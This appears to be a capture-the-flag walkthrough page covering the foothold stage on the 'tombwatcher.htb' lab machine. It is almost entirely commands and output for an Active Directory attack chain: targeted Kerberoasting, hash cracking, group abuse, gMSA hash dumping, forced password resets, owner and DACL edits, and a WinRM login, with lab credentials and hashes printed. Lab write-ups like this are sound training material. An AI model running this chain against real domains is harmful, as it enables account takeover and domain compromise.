Foothold

H3nry_987TGV!

❯ python3 ~/opt/AD/targetedKerberoast/targetedKerberoast.py -v -d "tombwatcher.htb" -u "henry" -p 'H3nry_987TGV!'

❯ hashcat -m 13100 alfred.hash ~/rockyou.txt -O --show
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$37<SNIP>8319d2cdd3:basketball

alfred:basketball

❯ bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "alfred" -p "basketball" add groupMember "Infrastructure" "Alfred"
[+] Alfred added to Infrastructure

❯ net rpc group members "Infrastructure" -U "tombwatcher.htb"/"alfred"%"basketball" -S "dc01.tombwatcher.htb"
TOMBWATCHER\Alfred

❯ python3 ~/opt/AD/gMSADumper/gMSADumper.py -u 'alfred' -p 'basketball' -d 'tombwatcher.htb'
Users or groups who can read password for ansible_dev$:
 > Infrastructure
ansible_dev$:::4f46405647993c7d4e1dc1c25dd6ecf4
ansible_dev$:aes256-cts-hmac-sha1-96:2712809c101bf9062a0fa145fa4db3002a632c2533e5a172e9ffee4343f89deb
ansible_dev$:aes128-cts-hmac-sha1-96:d7bda16ace0502b6199459137ff3c52d

ansible_dev$:::4f46405647993c7d4e1dc1c25dd6ecf4

❯ netexec smb 10.10.11.72 -u ansible_dev$ -H 4f46405647993c7d4e1dc1c25dd6ecf4 -M change-password -o USER='Sam' NEWPASS='Pwned123!'
SMB         10.10.11.72     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.10.11.72     445    DC01             [+] tombwatcher.htb\ansible_dev$:4f46405647993c7d4e1dc1c25dd6ecf4
CHANGE-P... 10.10.11.72     445    DC01             [+] Successfully changed password for Sam

❯ impacket-owneredit -action write -new-owner 'Sam' -target 'John' 'tombwatcher.htb'/'sam':'Pwned123!' -dc-ip 10.10.11.72
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Current owner information below
[*] - SID: S-1-5-21-1392491010-1358638721-2126982587-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=tombwatcher,DC=htb
[*] OwnerSid modified successfully!


❯ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'Sam' -target 'John' 'tombwatcher.htb'/'sam':'Pwned123!' -dc-ip 10.10.11.72
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20251010-211353.bak
[*] DACL modified successfully!

❯ python3 ~/opt/AD/targetedKerberoast/targetedKerberoast.py -v -d "tombwatcher.htb" -u "sam" -p 'Pwned123!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (john)
[+] Printing hash for (john)
$krb5tgs$23$*john$TOMBWATCHER.HTB$tombwatcher.htb/john*$5b11148ea0f7363512f0b42d11c6da91$ce1324df8cd18244862b4dc78d8aca6bf4dfc7f45e7d0b10989d4f8b601ae16c5506131bbffd7ad42bc8d44642d04928bc684396d93745d361d56470465e38dcaf62cfccb1cee7eaff3f9d24e639df367a0455a1ffd42dc54129c4a5c3f43dfd0dddd56e39b5c2610a6f65fbe06ada570af4402e4a2b87e1e73d17b84398693412597c98f43858b664ad883c34efb88ea387e7c24f9a704776cedd54636fd20ad8c394b3884efcb0ef09a48bbc8f7efe0bcff70db9e91a7815a6bad3e79897dd00044a0c1e4cf485a39778578e4864e83751d354d4d3dfd4253e858f099535d7d1f3e02b158ebc3fa2c5e4baba21605d29308c243e4e736c910246217596e8b8324db7aaffb39cef63c1600fd633b71f5a83a99cef55b37d82f0dc6e43e0ff72026aab585a2a14c9e291e8cfac54ff492a6be1a4b7337507e68a9c125c9dee90a0a1874395eacb07b59b7ae4e45ad9b8a55ec2d2c5da9ca0f55a91b049deb7c0a0a7472ca059022b041313a161d93e78ce77e2b54e6b5140bc651b3a86c2747cf98d469384cf6cf043f3948e10094e491c4597344eda3ba36de068e911fe9bd0787adef2c705b1969a69065b42b4e2a6bbc89f01dc1325c675276c0d7566e62f49d005c856c606e8bc4fb18b2ed8c5e5e3f7ca3f06f1dea56343d4a7941f305c1587fc9edae55ab58142ba9fb0c5324a4531604f0454c6766f38f26b07533720ad8d2ef23056e15e0e0944d0be158853d1b4a27b2bdcee2e295857107fd647ac326411c1a45f894f9257cbaa546d95ced4cf8a956ee320dc3672df103a2112988fd0fd7a2c4191a4e09c4e436b4bd240a90ea43316d3e67d36d473b5a2bfee6740f74ee35fb0737582bce6603b479932ecc21e9f0a76d5e96863f6a17b75646c68f79cc68fa332541332a9bda69c8745ed43b09b8b9484abfefdc83db4592d5c0c0eb550d4545beee122161a5ca0c193621206f5625e70221742ad417f3f5f1d05f32b488b6bb3e2e63fe17edff089d8b373e26433528b3a0ca01cc7e5e52484df5747f949f70c28855645a41859ab4b7384f1fb54ea67a3f6901aa6fa818fec70c9ea9fb034915a27e26e18f34ec2dc404b5b47b08326282dcdaa5cc8fe9d35b678b97b08325e04d32ce2e75e60283057a1eaa935b3e744714b6c7372560151d803753efadd2cfbea90b386aa5b7068214d677e63743c1faa33060bdd26bf69b9e8b639d734200079b2e4bee0706664c1fc3a251f2e37e9f84dcee61602c6c5155a02b20f3fe1690832537ed30068b7c49aabcb6a2af7680d68dcb651207d9e400d7fa0bf35512d1f9ec37dcc828546b49032563b1c8fe9ca652df4ac1ca2a295d5ac35c3866c6dc46b7fa79d63a434edc28f7065679b9d94f8ce7557f8b43873fcb1cf15a3b9e5b82917e61ac919762ca6a1
[VERBOSE] SPN removed successfully for (john)

Couldnt crack... PW reset it is

❯ netexec smb 10.10.11.72 -u Sam -p 'Pwned123!' -M change-password -o USER='John' NEWPASS='Pwned123!'
SMB         10.10.11.72     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.10.11.72     445    DC01             [+] tombwatcher.htb\Sam:Pwned123!
CHANGE-P... 10.10.11.72     445    DC01             [+] Successfully changed password for John

❯ netexec winrm 10.10.11.72 -u John -p 'Pwned123!'
WINRM       10.10.11.72     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:tombwatcher.htb)
WINRM       10.10.11.72     5985   DC01             [+] tombwatcher.htb\John:Pwned123! (Pwn3d!)

Previous389 NextPriv Esc

Last updated 1 month ago

Was this helpful?